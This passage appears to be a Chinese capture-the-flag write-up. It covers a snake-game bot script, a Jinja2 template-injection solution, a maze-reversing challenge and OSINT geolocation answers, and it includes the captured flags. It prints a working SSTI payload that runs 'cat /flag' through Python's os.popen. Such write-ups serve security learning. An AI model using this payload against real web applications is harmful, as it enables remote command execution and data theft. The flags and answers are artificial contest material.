"Cookie": "session=eyJ1c2VybmFtZSI6IjQzMjQyMzQyIn0.ZyZMsw.ZbZdzoOX_WSIYSfG-J7GDhcbx44",

}

# 设置代理

proxies = {

"http": "http://127.0.0.1:8082",

"https": "http://127.0.0.1:8082",

}

# 游戏的边界

width, height = 20, 20 # 根据实际游戏尺寸调整

# 初始方向设为向右

current_direction = "RIGHT"

# 获取下一个位置坐标

def get_next_position(head, direction):

if direction == "UP":

return [head[0], head[1] - 1]

elif direction == "DOWN":

return [head[0], head[1] + 1]

elif direction == "LEFT":

return [head[0] - 1, head[1]]

elif direction == "RIGHT":

return [head[0] + 1, head[1]]

# 判断下一个位置是否在边界内且不撞到蛇的身体

def is_safe_position(position, snake):

return position not in snake and is_within_bounds(position)

# 判断位置是否在边界内

def is_within_bounds(position):

x, y = position

return 0 <= x < width and 0 <= y < height

# 根据蛇头和食物的坐标来判断下一步移动方向

def get_next_direction(snake, food):

head_x, head_y = snake[0]

food_x, food_y = food

# 获取所有可能的方向

directions = ["UP", "DOWN", "LEFT", "RIGHT"]

# 优先朝向食物的方向

if head_x < food_x:

directions = ["RIGHT", "UP", "DOWN", "LEFT"]

elif head_x > food_x:

directions = ["LEFT", "UP", "DOWN", "RIGHT"]

elif head_y < food_y:

directions = ["DOWN", "LEFT", "RIGHT", "UP"]

elif head_y > food_y:

directions = ["UP", "LEFT", "RIGHT", "DOWN"]

# 检查每个方向是否安全

for direction in directions:

next_position = get_next_position(snake[0], direction)

if is_safe_position(next_position, snake):

return direction

return current_direction # 如果没有安全方向，保持当前方向

# 游戏循环，持续发送POST请求并处理响应

while True:

# 发送POST请求

data = {"direction": current_direction}

response = requests.post(url, json=data, headers=headers, proxies=proxies)

if response.status_code == 200:

game_data = response.json()

# 检查是否胜利或者游戏结束

if game_data.get("status") == "win":

print("游戏胜利！")

print("跳转到：", game_data.get("url"))

break

elif game_data.get("status") == "game_over":

print("游戏结束，分数：", game_data.get("score"))

break

# 更新蛇、食物、分数

snake = game_data.get("snake")

food = game_data.get("food")

score = game_data.get("score")

# 根据蛇头和食物的位置来确定下一步的方向

if snake:

current_direction = get_next_direction(snake, food)

print(f"当前分数：{score}，方向：{current_direction}")

else:

print("请求失败，状态码：", response.status_code)

print(response)

break

# 控制速度，避免请求过于频繁（根据游戏的刷新率调整）

time.sleep(0.1)

```

由代码自动跳转到页面 http://eci-2ze816q8joal2bw725c0.cloudeci1.ichunqiu.com:5000/snake_win?username=1测试发现username字段存在sql注入，sqlmap没有跑出来

判断后端sqlite数据库，推测使用的python写的后端，手工测了几次不行

考虑使用Python flask jinja2 的模板注入，Jinja2 引擎在渲染 username 参数时，会执行 {{ ... }} 内部的表达式。

使用payload：admin' union select 1,2,"{{lipsum.__globals__.__builtins__.eval('__import__(\'os\').popen(\'cat /flag\').read()')}}

获取到flag：flag{85d874b8-283b-4461-b8f9-f2940615ebd2}

bbox

dump出地图
unsigned int map[5600] =
{
  1u,
  1u,
  1u,
  1u,
  1u,
...
};
for (int n = 0; n < 14; n++)
	{
		for (int i = 0; i < 20; i++)
		{
			for (int j = 0; j < 20; j++)
			{
				printf("%d", map[400*n+20 * i + j]);
			}
			printf("\n");
		}
		printf("\n\n");
	}
得到：11111111111111111111
11111111111111111111
11411111111111111111
11030011111111111111
11011011111111111111
00000211111111111111
11101111111111111111
11101111111111111111
01100110001000100010
01000000001000100010
01000000001000111110
01111111111000000010
00000000001000000010
00001111111000111110
00001000001000100010
01111000001000100010
01000000001111100010
01000000000000000010
01000000001111100010
01000000000000000010


00000000000000000000
01111111111111111110
01000000000000000010
01200300040000000010
01000000000000000010
01111111111111101110
01000000000000000010
01000011111000111110
01000010001000100010
01111110001000100010
00000010000000100010
00111110001000111110
00100000001000000010
00100010111000111110
00100030001000100010
00111100001000100010
00400000001000100010
01111111111000100010
01000000000000000010
01000000000000000010


11111111111111111111
14000000000000000001
10111111111111100001
10100000000000100001
10100000000000100001
10103000000000100001
10111011101111100001
10000000000000000001
10111111111111011111
10000000100000000001
10000000000000001001
10000000100000001001
11111111100000001001
10000000000000002001
11111111111111111111
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000


11111111111111111111
14000000000000000001
10000001111111000001
10000000300001000001
10000001000001000001
10000001000021000001
10000001111111000001
10000000000000000001
11111111111111111111
10000000100000000001
10000000100000000111
10000000100000000100
10111111100000000100
10000000000000000100
11111111111111111111
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000


11111111111111111111
10000000000000000001
10111111111111111001
10100000000000001001
10101111111111111001
10101000000000001001
10101011111111111001
10101010000000000001
10101010111111111101
10001000100000000001
11111111111111111111
10000000000000100001
10000001111111101101
10000001000000001001
11111111111111111111
10000000000000040001
10000001111111110101
10000000000000300001
11111011111111101111
10000000000000020001


11111111111111111111
14000003000000000001
10111111111111100001
10100000002000000001
10101111111111101101
10101000001000001001
10101011111011101001
10001010001010001001
10111010101010101101
10100000000000000001
11111111111111101111
10000001000000000001
10000001111111011101
10000001000000301001
11111111400000001001
10000000000000001001
10111111111111111001
10100000000000000001
11111111111111111111
10000000000000000001


11111111111111111111
10000010000000000001
10111111111111111001
10100000000000001001
10101111111111111001
10101000021000000001
10101011111011111101
10101010000010000001
10001010111110111101
11111010100000100001
10000010101111101101
10111110101000001001
10100000101011111001
10101111101010000001
10003000000000111111
11111011111010100001
10000000000010101111
10111111111110001001
14000000000000001001
11111111111111111111


11111111111111111111
14000000000002003001
10111011111111111001
10100000000000000001
10101111111011111001
10101400001000001001
10101011111010101001
10101010001010101001
10101010111010101101
10003000100000000001
10111011111111111101
10000001000010000001
11111111111111111101
10003000000000041001
10111111111111111001
10100000001000000001
10101111111011111101
10101000001000001001
10101011111111111001
10000000000000000001


11111111111111111111
10000000000000100001
10111111111111111001
10100000000000001001
10101111111111111001
10101000000000000001
10101110111011111101
10001013001010001001
11111002111010101001
10000010100000101001
10111114101111111001
10100000001000000001
10101111101111111101
10101000000000001001
10001111111111111001
11111000000000000001
10000011111111111101
10111110000000000001
10100000000000000001
11111111111111111111


11111111111111111111
11111111111111111111
11111111111111111111
11100000000001111111
11101111111101111111
11101111111101111111
11101111111101111111
11101111111101111111
11101111111101111111
11100000000001111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111111111111
11111111111111111111
11111111111111111111


11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11011110111101111111
11011110111101111111
11011110111101111111
11011110111101111111
11011110111101111111
11101110111011111111
11101110111011111111
11101101010111111111
11110101010111111111
11110101010111111111
11111011101111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111


11111111111111111111
11111111111111111111
11111111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11100000000011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11100000000011111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111


11111111111111111111
11111111111111111111
11111110000011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110000011111111
11111111111111111111
11111111111111111111
11111111000111111111
11111111010111111111
11111111010111111111
11111111000111111111
11111111111111111111
11111111111111111111


00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000

手动推出每张图最短路：
2
12
13
9
21
13
25
31
3
还有四个字符是后四张地图qwb!
结合最后的提示，那么得到flag：
flag{qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9}

Master of OSINT

第二张，图可以看到百安居的招牌，到百度地图搜索百安居可以发现是百安居龙阳店和百安居商务大楼，利用百度地图拾取坐标系统可以得到坐标 121.566729,31.210738

第三张，图通过抖音识图可以知道最右边为双流机场塔台，可以知道为成都双流国际机场，沿着十号线在二号航站楼附近可以找到这个路口得到地址103.966693,30.571169

第四张，图卡车上写着浙通物流，上网搜索发现有杭州浙通物流有限公司，猜测图片位于杭州，继续搜索杭州带有大环形的高速，搜出来绕城高速，然后在沿线挨个查看有弧形与直线交叉的直线道路，可以找到乔莫西路辅路上的绕城高速附近的住宅区与图片中一样，可得到大概坐标120.294086,30.346038

第五张，搜索护栏为蓝白相间的地区可以得到地点为重庆，可以看到图片中是在建设，根据外形判断是商城，上网搜索重庆在建的商城，得到万象城二期附近与图片中相似，得到大概坐标106.524087,29.525444

第六张，看到远处有古塔，搜索各大城市古塔，根据形状高度与周边环境判断出为南京大报恩寺琉璃塔，再根据与塔的大致距离判断出大致坐标118.78403,32.013174

第七张，通过抖音识图得知左边为通往湖南师范大学的一栋高楼，通过图片可以判断这在一条河的桥上，根据已知可以得知这是橘子洲大桥，并且在桥上得到图片场景，得到大致坐标112.967877,28.20171

第八张，可以判断为跨河大桥上且河边有风力发电，再根据抖音识图加搜索，排除筛选后为上海长江大桥，沿桥筛选得到大致坐标121.735075,31.413123

第九张，判断为跨河大桥，首先想到武汉长江大桥，提交不正确重新筛选，搜索国内的跨江大桥，且根据江的颜色判断为长江，武汉居多，从武汉开始尝试，发现武汉天兴洲长江大桥正确，大致坐标114.412917,30.660256

第十张，在最左边可以模糊看到宏泰百货四个大字，百度搜索发现在杭州，在杭州市内放大筛选，百度地图搜索宏泰百货并在附近寻找有大量高架路地段，南秀路附近符合，得到大致坐标120.307975,30.154753